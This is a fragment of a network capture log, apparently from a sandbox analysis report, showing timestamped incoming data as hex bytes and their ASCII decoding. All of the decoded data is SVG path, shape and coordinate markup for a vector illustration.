                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9657INData Raw: 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 38 2e 38 38 2c 33 30 36 2e
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M548.88,306.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9673INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 33 34 2c 33 35 34 2e 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34
                                                                                                                                                                                                                                                                          Data Ascii: ss="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M583.34,354.2a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9689INData Raw: 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 32 2e 37 33 2c 31 38 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M332.73,18.3a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9705INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 31 37 2c 34 39 2e 38 32 61 31 2e 36 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: .24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.17,49.82a1.61,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9721INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 38 34 2c 38 39 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                          Data Ascii: 3,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,384,89a2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"/><pat
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9737INData Raw: 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c 31 31 39 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 5.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,119.34a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9753INData Raw: 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 37 31 2c 31 35 30 2e 38 36 41 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2c 34 34 32 2c 31 35 33 61 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: 442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.71,150.86A1.61,1.61,0,0,1,442,153a2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9769INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 31 35 2c 31 38 32 2e 33 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                                          Data Ascii: class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.15,182.38a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9801INData Raw: 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 34 2e 38 36 2c 33 32 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M484.86,32.62a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10297INData Raw: 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 33 2c 36 34 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.3,64.14a1.61,1.61,0,0,1-.73,2.09,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10313INData Raw: 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 39 2e 37 34 2c 39 35 2e 36 36 61 31 2e 36 31 2c 31 2e 36
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M539.74,95.66a1.61,1.6
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10329INData Raw: 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 6c 2d 2e 33 39 2c 34 4c 36 31
                                                                                                                                                                                                                                                                          Data Ascii: 9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94l-.39,4L61
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10345INData Raw: 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32 2e 30 36 2c 32 2e 30 36 2c 30 2c 30 2c 31 2c 2e 34 33 2d 2e 33 35 2c 32 2e 33 32 2c 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 35 33 2d 2e 32 34 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2c 2e 36 2d 2e 30 38 2c 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 31 2c 2e 31 39 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                                          Data Ascii: .45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2.06,2.06,0,0,1,.43-.35,2.32,2.32,0,0,1,.53-.24,2.35,2.35,0,0,1,.6-.08,2.15,2.15,0,0,1,1,.19,2,2,0,0,1,.6
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10361INData Raw: 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22 20 72 78 3d 22 37 2e 32 31 22 20 72 79 3d 22 32 2e 34 35 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 70 6f 69 6e 74 73 3d 22 36 36 38 2e 31 35 20 33 33 31 2e 34 38 20 36 36 34 2e 37 33 20 33 32 39 2e 31 35 20 36 36 34 2e 39 33 20 33 31 37 2e 37 34 20 36 36 38 2e 34 20 33 31
                                                                                                                                                                                                                                                                          Data Ascii: y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34" rx="7.21" ry="2.45"/><polygon class="cls-38" points="668.15 331.48 664.73 329.15 664.93 317.74 668.4 31
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10377INData Raw: 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 31 2e 36 22 20 72 79 3d 22 32 2e 30 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28
                                                                                                                                                                                                                                                                          Data Ascii: 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="1.6" ry="2.05" transform="translate(45.69 569.88) rotate(
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10393INData Raw: 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34 32 2e 32 32 73 2d 2e 31 37 2d 2e 30 38 2d 2e 33 33 2d 2e 34 37 6c 2d 2e 31 36 2d 2e 33 37 61 2e 33 35 2e 33 35 2c 30 2c 30 2c 31 2c 30 2d 2e 31 34 63 30 2d 2e 32 34 2e 32 33 2d 2e 32 36 2e 33 36 2d 2e 32 35 53 38 31 36 2e 36 35 2c 32 35 30 2e 35 39 2c 38 31 36 2e 37 37 2c 32 35 30 2e 38 35 5a 6d 2e 34 35 2e 30
                                                                                                                                                                                                                                                                          Data Ascii: 34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.42.22s-.17-.08-.33-.47l-.16-.37a.35.35,0,0,1,0-.14c0-.24.23-.26.36-.25S816.65,250.59,816.77,250.85Zm.45.0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10409INData Raw: 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 34 22 20 64 3d 22 4d 39 33 33 2e 37 32 2c 32 39 35 2e 38 33 61 33 31 2e 37 31 2c 33 31 2e 37 31 2c 30 2c 30 2c 31 2d 36 2e 32 2e 35 31 2c 33 32 2e 34 33 2c 33 32 2e 34 33 2c 30 2c 30 2c 31 2d 36 2e 32 34 2d 2e 35 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 35 22 20 64 3d 22 4d 39 33
                                                                                                                                                                                                                                                                          Data Ascii: ,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-114" d="M933.72,295.83a31.71,31.71,0,0,1-6.2.51,32.43,32.43,0,0,1-6.24-.51"/><path class="cls-115" d="M93
